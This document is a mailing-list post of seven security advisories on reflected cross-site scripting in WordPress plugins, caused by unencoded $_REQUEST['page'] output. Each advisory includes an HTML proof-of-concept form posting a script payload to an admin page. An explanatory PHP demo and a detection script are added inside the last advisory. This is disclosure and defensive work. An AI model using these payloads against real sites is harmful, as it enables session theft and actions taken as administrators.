Date: Sun, 17 Jul 2016 10:01:25 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple reflected Cross-Site Scripting vulnerabilities affecting seven WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Email Users WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Email Users
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0012

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Email Users [2] WordPress Plugin
version 4.8.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Email Users version 4.8.3 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Email Users [2] WordPress Plugin allows a WordPress user to send an
email to the registered blog users. Users can send personal emails to
each other. Power users can email groups of users and even notify group
of users of posts. A Cross-Site Scripting vulnerability was found in the
Email Users WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file email_users_user_settings.php and is caused
by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

<form id="email-users-filter" method="get">
	<!-- For plugins, we also need to ensure that the form posts back to our current page -->
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
	<!-- Now we can render the completed list table -->
	<?php $mailusersListTable->search_box(__('Search', MAILUSERS_I18N_DOMAIN), 'search_id'); ?>
	<?php $mailusersListTable->display() ; ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=mailusers-user-settings" method="POST">
			<input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_email_users_wordpress_plugin.html
[2] https://wordpress.org/plugins/email-users/
[3] https://downloads.wordpress.org/plugin/email-users.4.8.3.zip

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Google Forms WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Forms
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0021

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Forms [2] WordPress Plugin
version 0.84.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Google Forms version 0.85 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Google Forms [2] WordPress Plugin embeds a published, public Google
Form in a WordPress post, page, or widget. A Cross-Site Scripting
vulnerability was found in the Google Forms WordPress Plugin. This issue
allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wpgform-logging.php and is caused by the
lack of output encoding on the page request parameter. The vulnerable
code is listed below.

<form id="wpgform-log-entries-filter" method="get">
	<!-- For plugins, we also need to ensure that the form posts back to our current page -->
	<input type="hidden" name="post_type" value="<?php echo WPGFORM_CPT_FORM ?>" />
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
	<input type="hidden" name="_wp_http_referer" value="<?php echo admin_url('edit.php?post_type=' . WPGFORM_CPT_FORM . '&amp;page=wpgform-entry-log-page' ); ?>" />
	<!-- Now we can render the completed list table -->
	<?php //$wpgformListTable->search_box(__('Search', WPGFORM_I18N_DOMAIN), 'search_id'); ?>
	<?php $wpgformListTable->display() ; ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/edit.php?post_type=wpgform&page=wpgform-entry-log-page" method="POST">
			<input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_google_forms_wordpress_plugin.html
[2] https://wordpress.org/plugins/wpgform/
[3] https://downloads.wordpress.org/plugin/wpgform.0.85.zip

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Master Slider WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Master Slider
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0013

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Master Slider - Responsive Touch
Slider [2] WordPress Plugin version 2.7.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Master Slider version 2.8.0 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Master Slider [2] WordPress Plugin is a free responsive image and
content slider with super smooth hardware accelerated transitions. It
supports touch navigation with pure swipe gesture that you have never
experienced before. It's a truly responsive and device friendly slider
which works perfectly in all major devices. A Cross-Site Scripting
vulnerability was found in the Master Slider WordPress Plugin. This
issue allows an attacker to perform a wide variety of actions, such as
stealing Administrators' session tokens, or performing arbitrary actions
on their behalf. In order to exploit this issue, the attacker has to
lure/force a logged on WordPress Administrator into opening a malicious
website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file class-msp-list-table.php and is caused by
the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

return sprintf('<a href="?page=%s&action=%s&slider_id=%s">%s</a>', $_REQUEST['page'], 'edit', $item['ID'], $item['title'] );

[...]

$buttons .= sprintf( '<a class="action-duplicate msp-ac-btn msp-btn-gray msp-iconic" href="?page=%s&action=%s&slider_id=%s%s"><span></span>%s</a>', $_REQUEST['page'], 'duplicate', $item['ID'], $paged_arg, __('duplicate') );

[...]

$buttons .= sprintf( '<a class="action-delete msp-ac-btn msp-btn-red msp-iconic" href="?page=%s&action=%s&slider_id=%s%s" onClick="return confirm(\'%s\');" ><span></span>%s</a>', $_REQUEST['page'], 'delete', $item['ID'],

[...]

$buttons .= sprintf( '<a class="action-preview msp-ac-btn msp-btn-blue msp-iconic" href="?page=%s&action=%s&slider_id=%s" onClick="lunchMastersliderPreviewBySliderID(%s);return false;" ><span></span>%s</a>', $_REQUEST['page'], 'preview', $item['ID'], $item['ID'], __('preview') );

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=master-slider" method="POST">
			<input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_master_slider_wordpress_plugin.html
[2] https://wordpress.org/plugins/master-slider/
[3] https://downloads.wordpress.org/plugin/master-slider.2.8.0.zip

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Profile Builder WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Profile Builder
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0014

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Profile Builder - front-end user
registration, user profile and user login [2] WordPress Plugin version
2.4.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Profile Builder version 2.4.2 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Profile Builder [2] WordPress Plugin is a simple to use profile
plugin allowing front-end login, user registration and edit profile by
using shortcodes. A Cross-Site Scripting vulnerability was found in the
Profile Builder WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file class-email-confirmation.php and is caused
by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

<form id="movies-filter" method="get">
	<!-- For plugins, we also need to ensure that the form posts back to our current page -->
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
	<!-- Now we can render the completed list table -->
	<?php $listTable->display() ?>
</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/users.php?page=unconfirmed_emails" method="POST">
			<input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_profile_builder_wordpress_plugin.html
[2] https://wordpress.org/plugins/profile-builder/
[3] https://downloads.wordpress.org/plugin/profile-builder.2.4.2.zip

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Simple Membership WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Simple Membership
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0016

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Simple Membership [2] WordPress
Plugin version 3.2.8.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Simple Membership version 3.2.9 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Simple Membership [2] WordPress Plugin adds membership functionality
to your site. Protect members only content using content protection
easily. A Cross-Site Scripting vulnerability was found in the Simple
Membership WordPress Plugin. This issue allows an attacker to perform a
wide variety of actions, such as stealing Administrators' session
tokens, or performing arbitrary actions on their behalf. In order to
exploit this issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in several PHP files and is caused by the lack of
output encoding on the page request parameter. The vulnerable code is
listed below.

class.swpm-members.php:

'edit' => sprintf('<a href="admin.php?page=%s&member_action=edit&member_id=%s">Edit</a>', $_REQUEST['page'], $item['member_id']),

[...]

onclick="return confirm(\'Are you sure you want to delete this entry?\')">Delete</a>', $_REQUEST['page'], $item['member_id']),

class.swpm-membership-levels.php:

'edit' => sprintf('<a href="admin.php?page=%s&level_action=edit&id=%s">Edit</a>', $_REQUEST['page'], $item['id']),

[...]

onclick="return confirm(\'Are you sure you want to delete this entry?\')">Delete</a>', $_REQUEST['page'], $item['id']),

admin_members_list.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page']; ?>" />

admin_all_payment_transactions.php:

<input type="hidden" name="page" value="<?php echo $_REQUEST['page']; ?>" />

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=simple_wp_membership" method="POST">
			<input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_simple_membership_wordpress_plugin.html
[2] https://wordpress.org/plugins/simple-membership/
[3] https://downloads.wordpress.org/plugin/simple-membership.zip

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Top 10 - Popular posts plugin for
WordPress
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Top 10 - Popular
posts WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0017

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Top 10 - Popular posts plugin for
WordPress [2] WordPress Plugin version 2.3.0.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Top 10 version 2.3.1 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Top 10 - Popular posts plugin for WordPress [2] WordPress Plugin
tracks daily and total visits on blog posts. Display the count as well
as popular and trending posts. A Cross-Site Scripting vulnerability was
found in the Top 10 WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file class-stats.php and is caused by the lack
of output encoding on the page request parameter. The vulnerable code is
listed below.

<form method="get">
	<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
	<?php
	// If this is a search?
	if ( isset( $_REQUEST['s'] ) ) {
		$args['search'] = esc_sql( $_REQUEST['s'] );
	}

[...]

</form>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/admin.php?page=tptn_popular_posts" method="POST">
			<input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_top_10___popular_posts_plugin_for_wordpress.html
[2] https://wordpress.org/plugins/top-10/
[3] https://downloads.wordpress.org/plugin/top-10.zip

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in WP No External Links WordPress
Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the WP No External
Links WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0020

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP No External Links [2] WordPress
Plugin version 3.5.15.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WP No External Links version 3.5.16 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WP No External Links [2] WordPress Plugin masks all external links -
make them internal or hide. On your own posts, comments pages, and
authors page. A Cross-Site Scripting vulnerability was found in the WP
No External Links WordPress Plugin. This issue allows an attacker to
perform a wide variety of actions, such as stealing Administrators'
session tokens, or performing arbitrary actions on their behalf. In
order to exploit this issue, the attacker has to lure/force a logged on
WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file wp-noexternallinks-options.php and is
caused by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

<a href="?page=<?php echo $_REQUEST['page']; ?>"

[...]

<a href="?page=<?php echo $_REQUEST['page']; ?>&action=stats"

[...]

<input type="hidden" name="page" value="<?php echo $_REQUEST['page']; ?>">

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.
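The Details sections of all seven advisories above describe the same mechanism: WordPress validates the page slug it finds in the query string, but the plugin reads the slug from $_REQUEST, where a POST body field of the same name replaces the validated GET value, and then echoes it into an attribute without encoding. The following PHP is an added example written for this post; it is not code from any of the plugins or from the advisories. It emulates how PHP builds $_REQUEST (PHP's stock php.ini sets request_order = "GP"; when that directive is unset, variables_order, default "EGPCS", applies, and POST still follows GET), renders the hidden input the way the quoted snippets do, and then renders it the way a hardened plugin would: reading the already-validated $_GET value and attribute-encoding it. The page slug 'mailusers-user-settings' is taken from the first proof of concept; the breakout string, the page_is_registered() stand-in for WordPress's slug check, and htmlspecialchars() standing in for WordPress's esc_attr() are assumptions made for the example.

```php
<?php
// Added example, not from the advisories or the plugins: why a $_REQUEST
// lookup undoes the validation WordPress applied to the GET copy of "page",
// and what the same hidden input looks like when the value is taken from
// $_GET and attribute-encoded.

declare(strict_types=1);

/**
 * Emulate how PHP assembles $_REQUEST. Sources are merged in the order given
 * by request_order (stock php.ini: "GP"), so a POST key overrides a GET key
 * of the same name. Taking the arrays as parameters keeps this runnable from
 * the CLI, where the superglobals are empty.
 */
function build_request(array $get, array $post, string $order = 'GP'): array
{
    $request = [];
    foreach (str_split($order) as $source) {
        $request = array_merge($request, $source === 'G' ? $get : $post);
    }
    return $request;
}

/** Stand-in (assumption) for the slug check WordPress applies to the URL's page argument. */
function page_is_registered(string $page, array $registered): bool
{
    return in_array($page, $registered, true);
}

/** The pattern quoted in the advisories: value read from $_REQUEST, echoed raw. */
function vulnerable_hidden_input(array $request): string
{
    return '<input type="hidden" name="page" value="' . $request['page'] . '" />';
}

/**
 * Hardened form: read the GET copy that WordPress validated and encode it for
 * an attribute context. htmlspecialchars() with ENT_QUOTES stands in here for
 * WordPress's esc_attr(), which is what a plugin would call inside WordPress.
 */
function hardened_hidden_input(array $get): string
{
    $page = htmlspecialchars($get['page'] ?? '', ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="page" value="' . $page . '" />';
}

// Constructed request: the slug from the first proof of concept in the query
// string, and a constructed attribute-breakout string in the POST body.
$get        = ['page' => 'mailusers-user-settings'];
$post       = ['page' => '"><b>injected</b>'];
$registered = ['mailusers-user-settings'];

// WordPress checks the URL copy, which is a registered slug ...
echo 'URL page registered: ',
    page_is_registered($get['page'], $registered) ? 'yes' : 'no', PHP_EOL;

// ... but a $_REQUEST lookup hands the template the POST copy instead.
$request = build_request($get, $post);
echo 'request page seen by plugin: ', $request['page'], PHP_EOL;
echo 'vulnerable: ', vulnerable_hidden_input($request), PHP_EOL;
echo 'hardened:   ', hardened_hidden_input($get), PHP_EOL;
```

Run with `php` on the command line. The vulnerable rendering emits the body value verbatim, so the `"` closes the value attribute and the rest becomes markup; the hardened rendering emits the validated slug, and if the GET value ever did contain a quote it would arrive as `&quot;`. Reading from $_GET alone is not a substitute for encoding: the encoding is what removes the attribute-context injection, and using $_GET is what keeps the value aligned with the copy WordPress validated.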

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form action="http://<target>/wp-admin/options-general.php?page=wp-noexternallinks/wp-noexternallinks-options.php" method="POST">
			<input type="hidden" name="page" value="&quot;<script>alert(document.cookie);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_no_external_links_wordpress_plugin.html
[2] https://wordpress.org/plugins/wp-noexternallinks/
[3] https://downloads.wordpress.org/plugin/wp-noexternallinks.3.5.16.zip
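Since the same construct recurs across seven plugins (and, in the Simple Membership advisory, across four files of one plugin), a maintainer reviewing a plugin tree wants a quick first-pass check for it. The following PHP is an added example written for this post, not a tool from the advisories or from any of the plugins: a single-line heuristic that reports $_REQUEST lookups appearing in an output expression (echo, print, printf, sprintf) without a recognised escaping function wrapped directly around them. The sample source is constructed after the snippets quoted above and includes one escaped line and one non-output use so that the check's negatives are visible too. The list of escaping function names is an assumption and can be extended.

```php
<?php
// Added example, not from the advisories or the plugins: a first-pass audit
// for $_REQUEST values echoed without escaping. Single-line heuristic only;
// it is a starting point for manual review, not proof that a file is clean.

declare(strict_types=1);

/**
 * Return ['line' => n, 'text' => ...] for each line where a $_REQUEST lookup
 * sits in an output expression with no escaping call wrapped around it.
 */
function find_unescaped_request_output(string $source): array
{
    $findings = [];
    // Assumed set of WordPress/PHP functions that make the value safe for output.
    $escapers = '(?:esc_attr|esc_html|esc_url|esc_js|esc_textarea|intval|absint|sanitize_text_field)';

    foreach (explode("\n", $source) as $n => $line) {
        if (preg_match('/\$_REQUEST\s*\[/', $line) !== 1) {
            continue;
        }
        $outputSink = preg_match('/\b(echo|print|printf|sprintf)\b/', $line) === 1;
        $escaped    = preg_match('/' . $escapers . '\s*\(\s*\$_REQUEST/', $line) === 1;
        if ($outputSink && !$escaped) {
            $findings[] = ['line' => $n + 1, 'text' => trim($line)];
        }
    }
    return $findings;
}

// Constructed sample modelled on the quoted snippets, plus a hardened line (3)
// and a non-output use (4) that should not be reported.
$sample = <<<'PHP'
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
return sprintf('<a href="?page=%s&action=edit">%s</a>', $_REQUEST['page'], $title);
<input type="hidden" name="page" value="<?php echo esc_attr( $_REQUEST['page'] ); ?>" />
if ( isset( $_REQUEST['s'] ) ) { $args['search'] = esc_sql( $_REQUEST['s'] ); }
<a href="?page=<?php echo $_REQUEST['page']; ?>&action=stats">
PHP;

foreach (find_unescaped_request_output($sample) as $finding) {
    printf("line %d: %s\n", $finding['line'], $finding['text']);
}
```

On the constructed sample, lines 1, 2 and 5 are reported and lines 3 and 4 are not. To run it over a real plugin, feed `file_get_contents()` of each .php file to the function; multi-line statements and values escaped on a different line from where they are echoed will be missed, which is why the result is a review queue rather than a verdict.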
